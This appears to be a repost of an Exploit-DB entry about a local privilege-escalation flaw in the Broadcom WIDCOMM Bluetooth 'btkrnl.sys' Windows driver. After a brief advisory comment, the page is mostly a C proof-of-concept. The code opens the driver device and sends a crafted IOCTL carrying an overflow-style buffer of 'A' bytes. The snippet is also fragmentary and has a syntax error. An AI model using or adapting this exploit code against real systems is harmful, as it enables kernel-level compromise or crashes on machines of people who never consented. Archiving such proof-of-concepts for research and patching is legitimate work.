- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37964
- Проверка EDB
-
- Пройдено
- Автор
- NIKITA TARAKANOV
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2012-10-18
Broadcom WIDCOMM Bluetooth - 'btkrnl.sys' Driver Privilege Escalation
C:
/*
source: https://www.securityfocus.com/bid/56124/info
Broadcom WIDCOMM Bluetooth is prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with kernel privileges. Failed exploit attempts may result in a denial-of-service condition.
Broadcom WIDCOMM Bluetooth 5.6.0.6950 is vulnerable; other versions may also be affected.
*/
HANDLE hDevice;
char *inbuff, *outbuff;
DWORD ioctl, len,;
if ( (hDevice = CreateFileA("\\\\.\\btkrnl",
0,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device succesfully opened!\n");
}
else
{
printf("Error: Error opening device \n");
return 0;
}
inbuff = (char*)malloc(0x12000);
if(!inbuff){
printf("malloc failed!\n");
return 0;
}
outbuff = (char*)malloc(0x12000);
if(!outbuff){
printf("malloc failed!\n");
return 0;
}
ioctl = 0x2A04C0;
memset(inbuff, 0x41, 0x70);
DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL);- Источник
- www.exploit-db.com
